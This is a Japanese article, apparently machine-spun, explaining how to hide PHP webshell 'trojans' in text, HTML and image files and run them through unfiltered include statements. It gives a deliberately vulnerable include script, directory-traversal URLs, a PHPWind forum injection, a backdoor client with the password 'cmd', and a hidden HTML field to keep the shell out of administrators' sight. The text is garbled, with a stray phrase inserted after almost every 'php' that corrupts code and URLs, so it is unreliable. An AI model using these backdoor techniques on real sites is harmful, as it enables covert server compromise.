php(現在の主流の開発言語として)ステートメントをイメージに入れただけでは、いずれにしても実行されないことを知っておく必要があります。php(現在の主流の開発言語として)はphpの拡張子のみを解析するためです。 (現在の主流の開発言語として) ファイル。したがって、画像内に隠されたphp(現在主流の開発言語として)ステートメントを実行できる必要があります。 php(現在の主流の開発言語として)の呼び出し関数(include、requireなど)を使用するだけです。
数日前にトロイの木馬を写真に隠すという記事を私たちはまだ覚えています。つまり、php(現在の主流の開発言語として)ファイルで、include("x.gif") のようなステートメントを使用して、画像に隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、php (現在主流の開発言語) について少しでも知っている人であれば、イメージを直接呼び出して疑わしいものを見つけることは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。
include関数はphp(現在の主流の開発言語)でより頻繁に使用されているため、php(現在の主流の開発言語)WIND1.36などのセキュリティ上の問題が多すぎます。後ろの変数によってフィルタリングされていないことが含まれます。これから、同様のステートメントを構築して php (現在の主流の開発言語として) ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、php(現在の主流の開発言語として)WIND フォーラムに次のステートメントを挿入します: (現在の主流の開発言語として)WIND_ROOT;? @include include/.$php(現在主流の開発言語として)WIND_ROOT;?>>一般管理者は見ることができません。
include 関数の助けを借りて、php(現在の主流の開発言語として)トロイの木馬を、txt、html、画像ファイルなどのさまざまな種類のファイルに隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。
まず php (現在の主流の開発言語として) ファイル test.php (現在の主流の開発言語として) を作成します ファイルの内容は次のとおりです:
<?php (現在の主流の開発言語として) ) )
$test=$_GET[test];
@include test/.$test;
?>
Txt ファイルは一般に説明ファイルなので、ディレクトリの説明ファイルに一文のトロイの木馬を入れます。大丈夫です 。 TXT ファイル t.txt を作成するだけです。 Trojan という文を t.txt ファイルに貼り付けます。次に、 http://localhost/test/test.php (現在の主流の開発言語として) にアクセスします?test=../t.txt (現在の主流の開発言語として) ) w/index.php(現在の主流の開発言語として)?php(現在の主流の開発言語として)WIND_ROOT=../robots.txt>t.txtの中身を見ればOKです、そして、lanker microphp(現在の主流の開発言語として)のバックドアクライアントのトロイの木馬アドレスをhttp://localhost/test/test.php(現在の主流の開発言語として)に追加します?test=../t .txt <http://localhost/php(現在の主流の開発言語として)w/index.php(現在の主流の開発言語として)?php(現在の主流の開発言語として) 現在の主流の開発言語)WIND_ROOT=../robots.txt> パスワードに cmd を追加するだけで、実行によって返される結果を確認できます。
HTMLファイルの場合、通常はテンプレートファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のような隠し属性を持つテキスト ボックスを HTML に追加します。 その後、上記と同じ方法を使用します。実行によって返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。ソース ファイルの内容を として表示すると、ディレクトリは C:Uniserver2_7swww est として取得できます。